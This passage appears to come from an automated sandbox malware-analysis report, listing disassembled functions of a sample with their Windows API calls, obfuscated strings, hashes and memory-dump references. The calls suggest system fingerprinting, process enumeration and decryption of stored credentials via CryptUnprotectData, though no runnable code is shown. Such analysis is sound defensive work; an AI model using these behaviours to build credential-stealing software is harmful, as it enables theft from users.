                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID:
                                • API String ID: 2567437900-0
                                • Opcode ID: 3d8f9c1b9a4a0c9de7522da9d725525f50f162121e5cf119dba48930ee4fcf2b
                                • Instruction ID: 825e7dbd91c253878a84aed1b782bb4721f2c641de6ff596c233e3e153732908
                                • Opcode Fuzzy Hash: 3d8f9c1b9a4a0c9de7522da9d725525f50f162121e5cf119dba48930ee4fcf2b
                                • Instruction Fuzzy Hash: AB318C716211059BCB32EF28FC85A9E77F9AF80319F406528FE45B7251CB34EC058BA0
                                Function 00E62D60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00E671FE
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00E62D9B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 00E62DAD
                                • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00E62DBA
                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00E62DEC
                                • LocalFree.KERNEL32(00000000), ref: 00E62FCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: e9b96b10f1eeb06cc1cc2b94943c57c589b370278fee5795472bb7b881a6f48d
                                • Instruction ID: 1627766559f3c85a183e36fe047f8fe00a233492a96d8a40c5ce429dc14b8e77
                                • Opcode Fuzzy Hash: e9b96b10f1eeb06cc1cc2b94943c57c589b370278fee5795472bb7b881a6f48d
                                • Instruction Fuzzy Hash: 67B11870A40604CFC725CF14E548B95B7F2BB44369F29D1ADE508BB2A6D7769C82CF90
                                Function 011FD3C1 Relevance: 9.1, Strings: 6, Instructions: 1629COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: )3%$3b~$MOm$RL{$k)^$tYa`
                                • API String ID: 0-506928540
                                • Opcode ID: 21daf9c3ced7e86331efa9013b107be731febffbf649705d47e1199d41ad9ba1
                                • Instruction ID: 40523ed5b0d70885f3c9e511198e324e3ac4d4d5034cd38c5b5e375e80a1e215
                                • Opcode Fuzzy Hash: 21daf9c3ced7e86331efa9013b107be731febffbf649705d47e1199d41ad9ba1
                                • Instruction Fuzzy Hash: FBB217F3A0C2149FE304AE2DEC8567AFBE9EF94720F1A493DE6C4C7744E63558018696
                                Function 00E62C10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00E62C42
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E62C49
                                • GetTimeZoneInformation.KERNEL32(?), ref: 00E62C58
                                • wsprintfA.USER32 ref: 00E62C83
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID: wwww
                                • API String ID: 3317088062-671953474
                                • Opcode ID: 2db88540166748a00417d5a5bdf0d54b86831938fa011e35a6f9ca97cdf1999d
                                • Instruction ID: b1bc3aa0601e7439389e1423f20fcdfa1cab5826c3abf2c8d4c1fa805066fc35
                                • Opcode Fuzzy Hash: 2db88540166748a00417d5a5bdf0d54b86831938fa011e35a6f9ca97cdf1999d
                                • Instruction Fuzzy Hash: 2201F771E40604ABD7289B58DC09F6DBB69EB84721F004329F916E73C0D77919008BD1
                                Function 0120FCE5 Relevance: 7.8, Strings: 5, Instructions: 1597COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: la~$+w+l$gLZ~$[t$.G
                                • API String ID: 0-1658880353
                                • Opcode ID: 2ef84dc1ef24933dbbeecd17c79f878b24b934b7b2f3eb682be1477180bf8902
                                • Instruction ID: 98e8c52791f8260c7a8f7c49235a995b6c9b168b7ce3900e8d3ad8ddded7dfa2
                                • Opcode Fuzzy Hash: 2ef84dc1ef24933dbbeecd17c79f878b24b934b7b2f3eb682be1477180bf8902
                                • Instruction Fuzzy Hash: 36B2E4F3A0C2049FE3046E2DEC8567AFBE9EF94720F16492DE6C4C7740EA7598418697
                                Function 012117CB Relevance: 7.8, Strings: 5, Instructions: 1531COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: *s$/>'$RN$}|o$uN
                                • API String ID: 0-2582903438
                                • Opcode ID: 51d088f0134d9989a65dc45d2d12c4f254835e3d00bf1e762282ba0e43e5e3c6
                                • Instruction ID: 1deb5173b69b75f177716028e2a580de1aa714770b557ded59edb03ffe0dadfc
                                • Opcode Fuzzy Hash: 51d088f0134d9989a65dc45d2d12c4f254835e3d00bf1e762282ba0e43e5e3c6
                                • Instruction Fuzzy Hash: CBA2F6F3A0C6049FE304AE29EC8567AFBE5EF94720F16493DEAC4C3744EA3558458693
                                Function 00E47750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00E4775E
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00E47765
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00E4778D
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 00E477AD
                                • LocalFree.KERNEL32(?), ref: 00E477B7
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: 8710aa5f2f6cd57bf24b42c8fcf0d2d170a4e75f571cfe9ca1deb880af49a7d4
                                • Instruction ID: 278a29bdaf387a9dd4f2de05dd902701bbc9f625cbd03e7047d1f905036d30ed
                                • Opcode Fuzzy Hash: 8710aa5f2f6cd57bf24b42c8fcf0d2d170a4e75f571cfe9ca1deb880af49a7d4
                                • Instruction Fuzzy Hash: DF011275B503087FEB20DA94DC4AFAA7B78EB44B15F104155FB45FA2C4D6B5990087D0
                                Function 01203FD9 Relevance: 6.6, Strings: 4, Instructions: 1615COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: S{w$.w$4F$|{g
                                • API String ID: 0-1075808752
                                • Opcode ID: 6a1d0470c4fd264bc5a565f0fec40380b8d152d5ca11d628cd3d693ae77d77b5
                                • Instruction ID: f36441cee97aa4a60c4a3163e0416782523a6ddf6945cfebae8ad19baff9d82e
                                • Opcode Fuzzy Hash: 6a1d0470c4fd264bc5a565f0fec40380b8d152d5ca11d628cd3d693ae77d77b5
                                • Instruction Fuzzy Hash: 09B207F3A0C2109FE314AE2DEC8567ABBE5EF94320F16493DEAC5D3744EA3558018796
                                Function 0120C8AC Relevance: 6.5, Strings: 4, Instructions: 1487COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 5~C$I;$Kyz?$ntp
                                • API String ID: 0-2659641515
                                • Opcode ID: 0f61c7d6d6394a3fc24647df2f2e5ab93553d2dbf451b56e1587b65c0259899a
                                • Instruction ID: 4aff44530b2620fb1dbbec1695a344e569765706727c1bb978b4c90cec15edf5
                                • Opcode Fuzzy Hash: 0f61c7d6d6394a3fc24647df2f2e5ab93553d2dbf451b56e1587b65c0259899a
                                • Instruction Fuzzy Hash: 03A215F360C3049FE3146E29EC8567AFBE9EF94320F1A493DEAC483744EA3558458697
                                Function 00E63A50 Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00E671E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 00E671FE
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00E63A96
                                • Process32First.KERNEL32(00000000,00000128), ref: 00E63AA9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00E63ABF
                                  • Part of subcall function 00E67310: lstrlen.KERNEL32(------,00E45BEB), ref: 00E6731B
                                  • Part of subcall function 00E67310: lstrcpy.KERNEL32(00000000), ref: 00E6733F
                                  • Part of subcall function 00E67310: lstrcat.KERNEL32(?,------), ref: 00E67349
                                  • Part of subcall function 00E67280: lstrcpy.KERNEL32(00000000), ref: 00E672AE
                                • CloseHandle.KERNEL32(00000000), ref: 00E63BF7
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: 51d7ebd1e548ed8c8fd68bbf1de95d20d6bfc939903d9e0d9bb4eae2a7a23fa5
                                • Instruction ID: e6211c432586ed558e3b3032dec15c5e8c94117b7243270729b5a702bf638a36
                                • Opcode Fuzzy Hash: 51d7ebd1e548ed8c8fd68bbf1de95d20d6bfc939903d9e0d9bb4eae2a7a23fa5
                                • Instruction Fuzzy Hash: 8A81F730941204CFC724CF28E948B95B7F1FB45369F29D1ADE449AB2A2D7769D82CF90
                                Function 00E4EA30 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 00E4EA76
                                • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 00E4EA7E
                                • lstrcat.KERNEL32(00E6CFEC,00E6CFEC), ref: 00E4EB27
                                • lstrcat.KERNEL32(00E6CFEC,00E6CFEC), ref: 00E4EB49
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
